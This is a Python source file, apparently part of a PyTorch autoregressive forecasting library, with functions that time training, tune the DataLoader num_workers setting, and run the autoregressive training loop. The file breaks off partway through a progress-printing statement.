#-----------------------------------------------------------------------------.
# ############################
#### Autotune num_workers ####
# ############################
def timing_AR_Training(dataset,
model,
optimizer,
criterion,
ar_scheduler,
ar_training_strategy = "AR",
# DataLoader options
batch_size = 32,
shuffle = True,
shuffle_seed = 69,
num_workers = 0,
prefetch_in_gpu = False,
prefetch_factor = 2,
pin_memory = False,
asyncronous_gpu_transfer = True,
# Timing options
training_mode = True,
n_repetitions = 10,
verbose = True):
"""
Time execution and memory consumption of AR training.
Parameters
----------
dataset : AutoregressiveDataset
AutoregressiveDataset
model : pytorch model
pytorch model.
optimizer : pytorch optimizer
pytorch optimizer.
criterion : pytorch criterion
pytorch criterion
num_workers : 0, optional
Number of processes that generate batches in parallel.
0 means ONLY the main process will load batches (that can be a bottleneck).
1 means ONLY one worker (just not the main process) will load data
A high enough number of workers usually assures that CPU computations
are efficiently managed. However, increasing num_workers increase the
CPU memory consumption.
The Dataloader prefetch into the CPU prefetch_factor*num_workers batches.
The default is 0.
batch_size : int, optional
Number of samples within a batch. The default is 32.
shuffle : bool, optional
Wheter to random shuffle the samples at each epoch or when ar_iterations are updated.
The default is True.
shuffle_seed : int, optional
Empower deterministic random shuffling.
The shuffle_seed is increased by 1 when ar_iterations are updated.
prefetch_factor: int, optional
Number of sample loaded in advance by each worker.
The default is 2.
prefetch_in_gpu: bool, optional
Whether to prefetch 'prefetch_factor'*'num_workers' batches of data into GPU instead of CPU.
By default it prech 'prefetch_factor'*'num_workers' batches of data into CPU (when False)
The default is False.
pin_memory : bool, optional
When True, it prefetch the batch data into the pinned memory.
pin_memory=True enables (asynchronous) fast data transfer to CUDA-enabled GPUs.
Useful only if training on GPU.
The default is False.
asyncronous_gpu_transfer: bool, optional
Only used if 'prefetch_in_gpu' = True.
Indicates whether to transfer data into GPU asynchronously
training_mode : bool, optional
Whether to compute the gradients or time the "validation mode".
The default is True.
n_repetitions : int, optional
Number of runs to time. The default is 10.
verbose : bool, optional
Wheter to print the timing summary. The default is True.
Returns
-------
timing_info : dict
Dictionary with timing information of AR training.
"""
##------------------------------------------------------------------------.
# Check at least 1 pass is done
if n_repetitions < 1:
n_repetitions = 1
##------------------------------------------------------------------------.
if not isinstance(num_workers, int):
raise TypeError("'num_workers' must be a integer larger than 0.")
if num_workers < 0:
raise ValueError("'num_workers' must be a integer larger than 0.")
if not isinstance(training_mode, bool):
raise TypeError("'training_mode' must be either True or False.")
##------------------------------------------------------------------------.
# Retrieve informations
ar_iterations = dataset.ar_iterations
device = dataset.device
# Retrieve function to get time
get_time = get_time_function(device)
# Retrieve custom ar_batch_fun fuction
ar_batch_fun = dataset.ar_batch_fun
##------------------------------------------------------------------------.
# Get dimension infos
dim_info = dataset.dim_info
feature_info = dataset.feature_info
dim_info_dynamic = dim_info['dynamic']
# feature_names_dynamic = list(feature_info['dynamic'])
##------------------------------------------------------------------------.
# Initialize model
if training_mode:
model.train()
else:
model.eval()
##------------------------------------------------------------------------.
# Initialize list
Dataloader_timing = []
ar_batch_timing = []
ar_data_removal_timing = []
ar_forward_timing = []
ar_loss_timing = []
Backprop_timing = []
Total_timing = []
##-------------------------------------------------------------------------.
# Initialize DataLoader
trainingDataLoader = AutoregressiveDataLoader(dataset = dataset,
batch_size = batch_size,
drop_last_batch = True,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
num_workers = num_workers,
prefetch_factor = prefetch_factor,
prefetch_in_gpu = prefetch_in_gpu,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
trainingDataLoader_iter = iter(trainingDataLoader)
##-------------------------------------------------------------------------.
# Measure the size of model parameters
if device.type != 'cpu':
model_params_size = torch.cuda.memory_allocated()/1000/1000
else:
model_params_size = 0
##-------------------------------------------------------------------------.
# Repeat training n_repetitions
with torch.set_grad_enabled(training_mode):
for count in range(n_repetitions):
t_start = get_time()
# Retrieve batch
t_i = get_time()
training_batch_dict = next(trainingDataLoader_iter)
Dataloader_timing.append(get_time() - t_i)
# Perform AR iterations
dict_training_Y_predicted = {}
dict_training_loss_per_ar_iteration = {}
##---------------------------------------------------------------------.
# Initialize stuff for AR loop timing
tmp_ar_data_removal_timing = 0
tmp_ar_batch_timing = 0
tmp_ar_forward_timing = 0
tmp_ar_loss_timing = 0
tmp_ar_backprop_timing = 0
batch_memory_size = 0
for ar_iteration in range(ar_iterations+1):
# Retrieve X and Y for current AR iteration
t_i = get_time()
torch_X, torch_Y = ar_batch_fun(ar_iteration = ar_iteration,
batch_dict = training_batch_dict,
dict_Y_predicted = dict_training_Y_predicted,
device = device,
asyncronous_gpu_transfer = asyncronous_gpu_transfer)
tmp_ar_batch_timing = tmp_ar_batch_timing + (get_time() - t_i)
##-----------------------------------------------------------------.
# Measure model parameters + batch size in MB
if device.type != 'cpu' and ar_iteration == 0:
batch_memory_size = torch.cuda.memory_allocated()/1000/1000 - model_params_size
##-----------------------------------------------------------------.
# Forward pass and store output for stacking into next AR iterations
t_i = get_time()
dict_training_Y_predicted[ar_iteration] = model(torch_X)
tmp_ar_forward_timing = tmp_ar_forward_timing + (get_time() - t_i)
##-----------------------------------------------------------------.
# Compute loss for current forecast iteration
# - The criterion currently expects [data_points, nodes, features]
# So we collapse all other dimensions to a 'data_points' dimension
# TODO to generalize AR_Training to whatever tensor formats:
# - reshape_tensors_4_loss should be done in criterion
# - criterion should get args: dim_info, dynamic_features,
# - criterion can perform internally "per-variable loss", "per-variable masking"
t_i = get_time()
Y_pred, Y_obs = reshape_tensors_4_loss(Y_pred = dict_training_Y_predicted[ar_iteration],
Y_obs = torch_Y,
dim_info_dynamic = dim_info_dynamic)
dict_training_loss_per_ar_iteration[ar_iteration] = criterion(Y_obs, Y_pred)
tmp_ar_loss_timing = tmp_ar_loss_timing + (get_time() - t_i)
##-----------------------------------------------------------------.
# If ar_training_strategy is "AR", perform backward pass at each AR iteration
if ar_training_strategy == "AR":
# - Detach gradient of Y_pred (to avoid RNN-style optimization)
if training_mode:
dict_training_Y_predicted[ar_iteration] = dict_training_Y_predicted[ar_iteration].detach() # TODO: should not be detached after backward?
# - AR weight the loss (aka weight sum the gradients ...)
t_i = get_time()
dict_training_loss_per_ar_iteration[ar_iteration] = dict_training_loss_per_ar_iteration[ar_iteration]*ar_scheduler.ar_weights[ar_iteration]
tmp_ar_loss_timing = tmp_ar_loss_timing + (get_time() - t_i)
# - Measure model size requirements
if device.type != 'cpu':
model_memory_allocation = torch.cuda.memory_allocated()/1000/1000
else:
model_memory_allocation = 0
# - Backpropagate to compute gradients (the derivative of the loss w.r.t. the parameters)
if training_mode:
t_i = get_time()
dict_training_loss_per_ar_iteration[ar_iteration].backward()
tmp_ar_backprop_timing = tmp_ar_backprop_timing + (get_time() - t_i)
# - Update the total (AR weighted) loss
t_i = get_time()
if ar_iteration == 0:
training_total_loss = dict_training_loss_per_ar_iteration[ar_iteration]
else:
training_total_loss += dict_training_loss_per_ar_iteration[ar_iteration]
tmp_ar_loss_timing = tmp_ar_loss_timing + (get_time() - t_i)
##------------------------------------------------------------.
# Remove unnecessary stored Y predictions
t_i = get_time()
remove_unused_Y(ar_iteration = ar_iteration,
dict_Y_predicted = dict_training_Y_predicted,
dict_Y_to_remove = training_batch_dict['dict_Y_to_remove'])
del Y_pred, Y_obs, torch_X, torch_Y
if ar_iteration == ar_iterations:
del dict_training_Y_predicted
tmp_ar_data_removal_timing = tmp_ar_data_removal_timing + (get_time()- t_i)
##-------------------------------------------------------------------.
# If ar_training_strategy is RNN, perform backward pass after all AR iterations
if ar_training_strategy == "RNN":
t_i = get_time()
# - Compute total (AR weighted) loss
for i, (ar_iteration, loss) in enumerate(dict_training_loss_per_ar_iteration.items()):
if i == 0:
training_total_loss = ar_scheduler.ar_weights[ar_iteration] * loss
else:
training_total_loss += ar_scheduler.ar_weights[ar_iteration] * loss
tmp_ar_loss_timing = tmp_ar_loss_timing + (get_time() - t_i)
# - Measure model size requirements
if device.type != 'cpu':
model_memory_allocation = torch.cuda.memory_allocated()/1000/1000
else:
model_memory_allocation = 0
if training_mode:
# - Perform backward pass
t_i = get_time()
training_total_loss.backward()
tmp_ar_backprop_timing = tmp_ar_backprop_timing + (get_time() - t_i)
##--------------------------------------------------------------------.
# Update the network weights
if training_mode:
t_i = get_time()
# - Update the network weights
optimizer.step()
##----------------------------------------------------------------.
# Zeros all the gradients for the next batch training
# - By default gradients are accumulated in buffers (and not overwritten)
optimizer.zero_grad(set_to_none=True)
tmp_ar_backprop_timing = tmp_ar_backprop_timing + (get_time() - t_i)
##--------------------------------------------------------------------.
# Summarize timing
ar_batch_timing.append(tmp_ar_batch_timing)
ar_data_removal_timing.append(tmp_ar_data_removal_timing)
ar_forward_timing.append(tmp_ar_forward_timing)
ar_loss_timing.append(tmp_ar_loss_timing)
Backprop_timing.append(tmp_ar_backprop_timing)
##--------------------------------------------------------------------.
# - Total time elapsed
Total_timing.append(get_time() - t_start)
##------------------------------------------------------------------------.
# Create timing info dictionary
timing_info = {'Run': list(range(n_repetitions)),
'Total': Total_timing,
'Dataloader': Dataloader_timing,
'AR Batch': ar_batch_timing,
'Delete': ar_data_removal_timing,
'Forward': ar_forward_timing,
'Loss': ar_loss_timing,
'Backward': Backprop_timing}
##-------------------------------------------------------------------------.
memory_info = {'Model parameters': model_params_size,
'Batch': batch_memory_size,
'Forward pass': model_memory_allocation}
##-------------------------------------------------------------------------.
# Create timing table
if verbose:
table = []
headers = ['Run', 'Total', 'Dataloader','AR Batch', 'Delete', 'Forward', 'Loss', 'Backward']
for count in range(n_repetitions):
table.append([count,
round(Total_timing[count], 4),
round(Dataloader_timing[count], 4),
round(ar_batch_timing[count], 4),
round(ar_data_removal_timing[count], 4),
round(ar_forward_timing[count], 4),
round(ar_loss_timing[count], 4),
round(Backprop_timing[count], 4)
])
print(tabulate(table, headers=headers))
if device.type != 'cpu':
print("- Model parameters requires {:.2f} MB in GPU".format(memory_info['Model parameters']))
print("- A batch with {} samples for {} AR iterations allocate {:.2f} MB in GPU".format(batch_size, ar_iterations, memory_info['Batch']))
print("- The model forward pass allocates {:.2f} MB in GPU.".format(memory_info['Forward pass']))
##------------------------------------------------------------------------.
### Reset model to training mode
model.train()
##------------------------------------------------------------------------.
### Delete Dataloader to avoid deadlocks
del trainingDataLoader_iter
del trainingDataLoader
##------------------------------------------------------------------------.
return timing_info, memory_info
def tune_num_workers(dataset,
model,
optimizer,
criterion,
num_workers_list,
ar_scheduler,
ar_training_strategy = "AR",
# DataLoader options
batch_size = 32,
shuffle = True,
shuffle_seed = 69,
prefetch_in_gpu = False,
prefetch_factor = 2,
pin_memory = False,
asyncronous_gpu_transfer = True,
# Timing options
training_mode = True,
n_repetitions = 10,
n_pass_to_skip = 4,
summary_stat = "max",
verbose = True):
"""
Search for the best value of 'num_workers'.
Parameters
----------
dataset : AutoregressiveDataset
AutoregressiveDataset
model : pytorch model
pytorch model.
optimizer : pytorch optimizer
pytorch optimizer.
criterion : pytorch criterion
pytorch criterion
ar_scheduler :
Scheduler regulating the changes in loss weights (per AR iteration) during RNN/AR training
ar_training_strategy : str
Either "AR" or "RNN"
"AR" perform the backward pass at each AR iteration
"RNN" perform the backward pass after all AR iterations
num_workers_list : list
A list of num_workers to time.
batch_size : int, optional
Number of samples within a batch. The default is 32.
prefetch_factor: int, optional
Number of sample loaded in advance by each worker.
The default is 2.
prefetch_in_gpu: bool, optional
Whether to prefetch 'prefetch_factor'*'num_workers' batches of data into GPU instead of CPU.
By default it prech 'prefetch_factor'*'num_workers' batches of data into CPU (when False)
The default is False.
pin_memory : bool, optional
When True, it prefetch the batch data into the pinned memory.
pin_memory=True enables (asynchronous) fast data transfer to CUDA-enabled GPUs.
Useful only if training on GPU.
The default is False.
asyncronous_gpu_transfer: bool, optional
Only used if 'prefetch_in_gpu' = True.
Indicates whether to transfer data into GPU asynchronously
training_mode : bool, optional
Whether to compute the gradients or time the "validation mode".
The default is True.
n_repetitions : int, optional
Number of runs to time. The default is 10.
n_pass_to_skip : int
The default is 2.
Avoid timing also the worker initialization when num_workers > 0
summary_stat : bool, optional
Statical function to summarize timing
The default is 'max'.
Valid values are ('min','mean','median','max').
The first 'n_pass_to_skip' batch pass are excluded because they might not
be representative of the actual performance (workers initializations)
verbose : bool, optional
Wheter to print the timing summary. The default is True.
Returns
-------
optimal_num_workers : int
Optimal num_workers to use for efficient data loading.
"""
##------------------------------------------------------------------------.
# Check at least 1 pass is done
if n_pass_to_skip < 0:
n_pass_to_skip = 0
n_repetitions = n_repetitions + n_pass_to_skip
##------------------------------------------------------------------------.
# Checks arguments
if isinstance(num_workers_list, int):
num_workers_list = [num_workers_list]
# Define summary statistic
if summary_stat == "median":
summary_fun = np.median
elif summary_stat == "max":
summary_fun = np.max
elif summary_stat == "min":
summary_fun = np.min
elif summary_stat == "mean":
summary_fun = np.mean
else:
raise ValueError("Valid summary_stat values are ('min','mean','median','max').")
##------------------------------------------------------------------------.
# Initialize dictionary
Dataloader_timing = {i: [] for i in num_workers_list }
ar_batch_timing = {i: [] for i in num_workers_list }
ar_data_removal_timing = {i: [] for i in num_workers_list }
ar_forward_timing = {i: [] for i in num_workers_list }
ar_loss_timing = {i: [] for i in num_workers_list }
Backprop_timing = {i: [] for i in num_workers_list }
Total_timing = {i: [] for i in num_workers_list }
Memory_Info = {i: [] for i in num_workers_list }
##------------------------------------------------------------------------.
# Time AR training for specified num_workers in num_workers_list
for num_workers in num_workers_list:
timing_info, memory_info = timing_AR_Training(dataset = dataset,
model = model,
optimizer = optimizer,
criterion = criterion,
ar_scheduler = ar_scheduler,
ar_training_strategy = ar_training_strategy,
# DataLoader options
batch_size = batch_size,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
num_workers = num_workers,
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
# Timing options
training_mode = training_mode,
n_repetitions = n_repetitions,
verbose = False)
Dataloader_timing[num_workers] = timing_info['Dataloader'][n_pass_to_skip:]
ar_batch_timing[num_workers] = timing_info['AR Batch'][n_pass_to_skip:]
ar_data_removal_timing[num_workers] = timing_info['Delete'][n_pass_to_skip:]
ar_forward_timing[num_workers] = timing_info['Forward'][n_pass_to_skip:]
ar_loss_timing[num_workers] = timing_info['Loss'][n_pass_to_skip:]
Backprop_timing[num_workers] = timing_info['Backward'][n_pass_to_skip:]
Total_timing[num_workers] = timing_info['Total'][n_pass_to_skip:]
Memory_Info[num_workers] = memory_info
##------------------------------------------------------------------------.
### Summarize timing results
headers = ['N. workers', 'Total', 'Dataloader','AR Batch', 'Delete', 'Forward', 'Loss', 'Backward']
table = []
dtloader = []
for num_workers in num_workers_list:
dtloader.append(summary_fun(Dataloader_timing[num_workers]).round(4))
table.append([num_workers,
summary_fun(Total_timing[num_workers]).round(4),
summary_fun(Dataloader_timing[num_workers]).round(4),
summary_fun(ar_batch_timing[num_workers]).round(4),
summary_fun(ar_data_removal_timing[num_workers]).round(4),
summary_fun(ar_forward_timing[num_workers]).round(4),
summary_fun(ar_loss_timing[num_workers]).round(4),
summary_fun(Backprop_timing[num_workers]).round(4)])
##------------------------------------------------------------------------.
# Select best num_workers
optimal_num_workers = num_workers_list[np.argmin(dtloader)]
##------------------------------------------------------------------------.
# Print timing results
if verbose:
print(tabulate(table, headers=headers))
if dataset.device.type != 'cpu':
memory_info = Memory_Info[optimal_num_workers]
print("- Model parameters requires {:.2f} MB in GPU.".format(memory_info['Model parameters']))
print("- A batch with {} samples for {} AR iterations allocate {:.2f} MB in GPU.".format(batch_size, dataset.ar_iterations, memory_info['Batch']))
print("- The model forward pass allocates {:.2f} MB in GPU.".format(memory_info['Forward pass']))
##------------------------------------------------------------------------.
return optimal_num_workers
#----------------------------------------------------------------------------.
# #########################
#### Training function ####
# #########################
def AutoregressiveTraining(model,
model_fpath,
# Loss settings
criterion,
ar_scheduler,
early_stopping,
optimizer,
# Data
training_data_dynamic,
training_data_bc = None,
data_static = None,
validation_data_dynamic = None,
validation_data_bc = None,
bc_generator = None,
scaler = None,
# AR_batching_function
ar_batch_fun = get_aligned_ar_batch,
# Dataloader options
prefetch_in_gpu = False,
prefetch_factor = 2,
drop_last_batch = True,
shuffle = True,
shuffle_seed = 69,
num_workers = 0,
autotune_num_workers = False,
pin_memory = False,
asyncronous_gpu_transfer = True,
# Autoregressive settings
input_k = [-3,-2,-1],
output_k = [0],
forecast_cycle = 1,
ar_iterations = 6,
stack_most_recent_prediction = True,
# Training settings
ar_training_strategy = "AR",
lr_scheduler = None,
training_batch_size = 128,
validation_batch_size = 128,
epochs = 10,
scoring_interval = 10,
save_model_each_epoch = False,
ar_training_info = None,
# SWAG settings
swag = False,
swag_model = None,
swag_freq = 10,
swa_start = 8,
# GPU settings
device = 'cpu'):
"""AutoregressiveTraining.
ar_batch_fun : callable
Custom function that batch/stack together data across AR iterations.
The custom function must return a tuple of length 2 (X, Y), but X and Y
can be whatever desired objects (torch.Tensor, dict of Tensor, ...).
The custom function must have the following arguments:
def ar_batch_fun(ar_iteration, batch_dict, dict_Y_predicted,
device = 'cpu', asyncronous_gpu_transfer = True)
The default ar_batch_fun function is the pre-implemented get_aligned_ar_batch() which return
two torch.Tensor: one for X (input) and one four Y (output). Such function expects
the dynamic and bc batch data to have same dimensions and shape.
if early_stopping=None, no ar_iteration update
"""
with dask.config.set(scheduler='synchronous'):
##------------------------------------------------------------------------.
time_start_training = time.time()
## Checks arguments
device = check_device(device)
pin_memory = check_pin_memory(pin_memory=pin_memory, num_workers=num_workers, device=device)
asyncronous_gpu_transfer = check_asyncronous_gpu_transfer(asyncronous_gpu_transfer=asyncronous_gpu_transfer, device=device)
prefetch_in_gpu = check_prefetch_in_gpu(prefetch_in_gpu=prefetch_in_gpu, num_workers=num_workers, device=device)
prefetch_factor = check_prefetch_factor(prefetch_factor=prefetch_factor, num_workers=num_workers)
ar_training_strategy = check_ar_training_strategy(ar_training_strategy)
##------------------------------------------------------------------------.
# Check ar_scheduler
if len(ar_scheduler.ar_weights) > ar_iterations+1:
raise ValueError("The AR scheduler has {} AR weights, but ar_iterations is specified to be {}".format(len(ar_scheduler.ar_weights), ar_iterations))
if ar_iterations == 0:
if ar_scheduler.method != "constant":
print("Since 'ar_iterations' is 0, ar_scheduler 'method' is changed to 'constant'.")
ar_scheduler.method = "constant"
##------------------------------------------------------------------------.
# Check that autoregressive settings are valid
# - input_k and output_k must be numpy arrays hereafter !
print("- Defining AR settings:")
input_k = check_input_k(input_k=input_k, ar_iterations=ar_iterations)
output_k = check_output_k(output_k=output_k)
check_ar_settings(input_k = input_k,
output_k = output_k,
forecast_cycle = forecast_cycle,
ar_iterations = ar_iterations,
stack_most_recent_prediction = stack_most_recent_prediction)
##------------------------------------------------------------------------.
# Check training data
if training_data_dynamic is None:
raise ValueError("'training_data_dynamic' must be provided !")
##------------------------------------------------------------------------.
## Check validation data
if validation_data_dynamic is not None:
if not xr_is_aligned(training_data_dynamic, validation_data_dynamic, exclude="time"):
raise ValueError("training_data_dynamic' and 'validation_data_dynamic' does not"
"share same dimensions (order and values)(excluding 'time').")
if validation_data_bc is not None:
if training_data_dynamic is None:
raise ValueError("If 'validation_data_bc' is provided, also 'training_data_dynamic' must be specified.")
if not xr_is_aligned(training_data_bc, validation_data_bc, exclude="time"):
raise ValueError("training_data_bc' and 'validation_data_bc' does not"
"share same dimensions (order and values)(excluding 'time').")
##------------------------------------------------------------------------.
## Check early stopping
if validation_data_dynamic is None:
if early_stopping is not None:
if early_stopping.stopping_metric == "total_validation_loss":
print("Validation dataset is not provided."
"Stopping metric of early_stopping set to 'total_training_loss'")
early_stopping.stopping_metric = "total_training_loss"
##------------------------------------------------------------------------.
## Decide wheter to tune num_workers
if autotune_num_workers and (num_workers > 0):
num_workers_list = list(range(0, num_workers))
else:
num_workers_list = [num_workers]
##------------------------------------------------------------------------.
# Ensure criterion and model are on device
model.to(device)
criterion.to(device)
##------------------------------------------------------------------------.
# Zeros gradients
optimizer.zero_grad(set_to_none=True)
##------------------------------------------------------------------------.
### Create Datasets
t_i = time.time()
trainingDataset = AutoregressiveDataset(data_dynamic = training_data_dynamic,
data_bc = training_data_bc,
data_static = data_static,
bc_generator = bc_generator,
scaler = scaler,
# Custom AR batching function
ar_batch_fun = ar_batch_fun,
training_mode = True,
# Autoregressive settings
input_k = input_k,
output_k = output_k,
forecast_cycle = forecast_cycle,
ar_iterations = ar_scheduler.current_ar_iterations,
stack_most_recent_prediction = stack_most_recent_prediction,
# GPU settings
device = device)
if validation_data_dynamic is not None:
validationDataset = AutoregressiveDataset(data_dynamic = validation_data_dynamic,
data_bc = validation_data_bc,
data_static = data_static,
bc_generator = bc_generator,
scaler = scaler,
# Custom AR batching function
ar_batch_fun = ar_batch_fun,
training_mode = True,
# Autoregressive settings
input_k = input_k,
output_k = output_k,
forecast_cycle = forecast_cycle,
ar_iterations = ar_scheduler.current_ar_iterations,
stack_most_recent_prediction = stack_most_recent_prediction,
# GPU settings
device = device)
else:
validationDataset = None
print('- Creation of AutoregressiveDatasets: {:.0f}s'.format(time.time() - t_i))
##------------------------------------------------------------------------.
### Time execution
# - Time AR training
print("- Timing AR training with {} AR iterations:".format(trainingDataset.ar_iterations))
training_num_workers = tune_num_workers(dataset = trainingDataset,
model = model,
optimizer = optimizer,
criterion = criterion,
num_workers_list = num_workers_list,
ar_scheduler = ar_scheduler,
ar_training_strategy = ar_training_strategy,
# DataLoader options
batch_size = training_batch_size,
shuffle = shuffle,
shuffle_seed = shuffle_seed, # This cause training on same batch n_repetitions times
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
# Timing options
training_mode = True,
n_repetitions = 5,
verbose = True)
print(' --> Selecting num_workers={} for TrainingDataLoader.'.format(training_num_workers))
# - Time AR validation
if validationDataset is not None:
print()
print("- Timing AR validation with {} AR iterations:".format(validationDataset.ar_iterations))
validation_num_workers = tune_num_workers(dataset = validationDataset,
model = model,
optimizer = optimizer,
criterion = criterion,
num_workers_list = num_workers_list,
ar_scheduler = ar_scheduler,
ar_training_strategy = ar_training_strategy,
# DataLoader options
batch_size = validation_batch_size,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
# Timing options
training_mode = False,
n_repetitions = 5,
verbose = True)
print(' --> Selecting num_workers={} for ValidationDataLoader.'.format(validation_num_workers))
##------------------------------------------------------------------------.
## Create DataLoaders
# - Prefetch (prefetch_factor*num_workers) batches parallelly into CPU
# - At each AR iteration, the required data are transferred asynchronously to GPU
# - If static data are provided, they are prefetched into the GPU
# - Some data are duplicated in CPU memory because of the data overlap between forecast iterations.
# However this mainly affect boundary conditions data, because dynamic data
# after few AR iterations are the predictions of previous AR iteration.
t_i = time.time()
trainingDataLoader = AutoregressiveDataLoader(dataset = trainingDataset,
batch_size = training_batch_size,
drop_last_batch = drop_last_batch,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
num_workers = training_num_workers,
prefetch_factor = prefetch_factor,
prefetch_in_gpu = prefetch_in_gpu,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
if validation_data_dynamic is not None:
validationDataLoader = AutoregressiveDataLoader(dataset = validationDataset,
batch_size = validation_batch_size,
drop_last_batch = drop_last_batch,
shuffle = shuffle,
shuffle_seed = shuffle_seed,
num_workers = validation_num_workers,
prefetch_in_gpu = prefetch_in_gpu,
prefetch_factor = prefetch_factor,
pin_memory = pin_memory,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
validationDataLoader_iter = cylic_iterator(validationDataLoader)
print('- Creation of AutoregressiveDataLoaders: {:.0f}s'.format(time.time() - t_i))
else:
validationDataset = None
validationDataLoader_iter = None
##------------------------------------------------------------------------.
# Initialize AR_TrainingInfo instance if not provided
# - Initialization occurs when a new model training starts
# - Passing an AR_TrainingInfo instance allows to continue model training from where it stopped !
# --> The ar_scheduler of previous training must be provided to ar_Training() !
if ar_training_info is not None:
if not isinstance(ar_training_info, AR_TrainingInfo):
raise TypeError("If provided, 'ar_training_info' must be an instance of AR_TrainingInfo class.")
# TODO: Check AR scheduler weights are compatible ! or need numpy conversion
# ar_scheduler = ar_training_info.ar_scheduler
else:
ar_training_info = AR_TrainingInfo(ar_iterations=ar_iterations,
epochs = epochs,
ar_scheduler = ar_scheduler)
##------------------------------------------------------------------------.
# Get dimension and feature infos
# TODO: this is only used by the loss, --> future refactoring
dim_info = trainingDataset.dim_info
dim_order = trainingDataset.dim_order
feature_info = trainingDataset.feature_info
feature_order = trainingDataset.feature_order
dim_info_dynamic = dim_info['dynamic']
# feature_dynamic = list(feature_info['dynamic'])
##------------------------------------------------------------------------.
# Retrieve custom ar_batch_fun fuction
ar_batch_fun = trainingDataset.ar_batch_fun
##------------------------------------------------------------------------.
# Set model layers (i.e. batchnorm) in training mode
model.train()
optimizer.zero_grad(set_to_none=True)
##------------------------------------------------------------------------.
# Iterate along epochs
print("")
print("========================================================================================")
flag_stop_training = False
t_i_scoring = time.time()
for epoch in range(epochs):
ar_training_info.new_epoch()
##--------------------------------------------------------------------.
# Iterate along training batches
trainingDataLoader_iter = iter(trainingDataLoader)
##--------------------------------------------------------------------.
# Compute collection points for SWAG training
num_batches = len(trainingDataLoader_iter)
batch_indices = range(num_batches)
swag_training = swag and swag_model and epoch >= swa_start
if swag_training:
freq = int(num_batches/(swag_freq-1))
collection_indices = list(range(0, num_batches, freq))
##--------------------------------------------------------------------.
for batch_count in batch_indices:
##----------------------------------------------------------------.
# Retrieve the training batch
training_batch_dict = next(trainingDataLoader_iter)
##----------------------------------------------------------------.
# Perform autoregressive training loop
# - The number of AR iterations is determined by ar_scheduler.ar_weights
# - If ar_weights are all zero after N forecast iteration:
# --> Load data just for F forecast iteration
# --> Autoregress model predictions just N times to save computing time
dict_training_Y_predicted = {}
dict_training_loss_per_ar_iteration = {}
for ar_iteration in range(ar_scheduler.current_ar_iterations+1):
# Retrieve X and Y for current AR iteration
# - ar_batch_fun() function stack together the required data from the previous AR iteration
torch_X, torch_Y = ar_batch_fun(ar_iteration = ar_iteration,
batch_dict = training_batch_dict,
dict_Y_predicted = dict_training_Y_predicted,
asyncronous_gpu_transfer = asyncronous_gpu_transfer,
device = device)
##-------------------------------------------------------------.
# # Print memory usage dataloader
# if device.type != 'cpu':
# # torch.cuda.synchronize()
# print("{}: {:.2f} MB".format(ar_iteration, torch.cuda.memory_allocated()/1000/1000))
##-------------------------------------------------------------.
# Forward pass and store output for stacking into next AR iterations
dict_training_Y_predicted[ar_iteration] = model(torch_X)
##-------------------------------------------------------------.
# Compute loss for current forecast iteration
# - The criterion expects [data_points, nodes, features]
# - Collapse all other dimensions to a 'data_points' dimension
Y_pred, Y_obs = reshape_tensors_4_loss(Y_pred = dict_training_Y_predicted[ar_iteration],
Y_obs = torch_Y,
dim_info_dynamic = dim_info_dynamic)
dict_training_loss_per_ar_iteration[ar_iteration] = criterion(Y_obs, Y_pred)
##-------------------------------------------------------------.
# If ar_training_strategy is "AR", perform backward pass at each AR iteration
if ar_training_strategy == "AR":
# - Detach gradient of Y_pred (to avoid RNN-style optimization)
dict_training_Y_predicted[ar_iteration] = dict_training_Y_predicted[ar_iteration].detach() # TODO: should not be detached after backward?
# - AR weight the loss (aka weight sum the gradients ...)
current_ar_loss = dict_training_loss_per_ar_iteration[ar_iteration]
current_ar_loss = current_ar_loss*ar_scheduler.ar_weights[ar_iteration]
# - Backpropagate to compute gradients (the derivative of the loss w.r.t. the parameters)
current_ar_loss.backward()
del current_ar_loss
##------------------------------------------------------------.
# Remove unnecessary stored Y predictions
remove_unused_Y(ar_iteration = ar_iteration,
dict_Y_predicted = dict_training_Y_predicted,
dict_Y_to_remove = training_batch_dict['dict_Y_to_remove'])
del Y_pred, Y_obs, torch_X, torch_Y
if ar_iteration == ar_scheduler.current_ar_iterations:
del dict_training_Y_predicted
##------------------------------------------------------------.
# # Print memory usage dataloader + model
# if device.type != 'cpu':
# torch.cuda.synchronize()
# print("{}: {:.2f} MB".format(ar_iteration, torch.cuda.memory_allocated()/1000/1000))
##----------------------------------------------------------------.
# - Compute total (AR weighted) loss
for i, (ar_iteration, loss) in enumerate(dict_training_loss_per_ar_iteration.items()):
if i == 0:
training_total_loss = ar_scheduler.ar_weights[ar_iteration] * loss
else:
training_total_loss += ar_scheduler.ar_weights[ar_iteration] * loss
##----------------------------------------------------------------.
# - If ar_training_strategy is RNN, perform backward pass after all AR iterations
if ar_training_strategy == "RNN":
# - Perform backward pass using training_total_loss (after all AR iterations)
training_total_loss.backward()
##----------------------------------------------------------------.
# - Update the network weights
optimizer.step()
##----------------------------------------------------------------.
# Zeros all the gradients for the next batch training
# - By default gradients are accumulated in buffers (and not overwritten)
optimizer.zero_grad(set_to_none=True)
##----------------------------------------------------------------.
# - Update training statistics # TODO: This require CPU-GPU synchronization
if ar_training_info.iteration_from_last_scoring == scoring_interval:
ar_training_info.update_training_stats(total_loss = training_total_loss,
dict_loss_per_ar_iteration = dict_training_loss_per_ar_iteration,
ar_scheduler = ar_scheduler,
lr_scheduler = lr_scheduler)
##----------------------------------------------------------------.
# Printing infos (if no validation data available)
if validationDataset is None:
if batch_count % scoring_interval == 0:
print("Epoch: {} | Batch: {}/{} | AR: {} | Loss: {} | "
"ES: {}/{}".format(epoch, batch_count, num_batches,
ar_iteration,
round(dict_training_loss_per_ar_iteration[ar_iteration].item(),5), # TODO: This require CPU-GPU synchronization
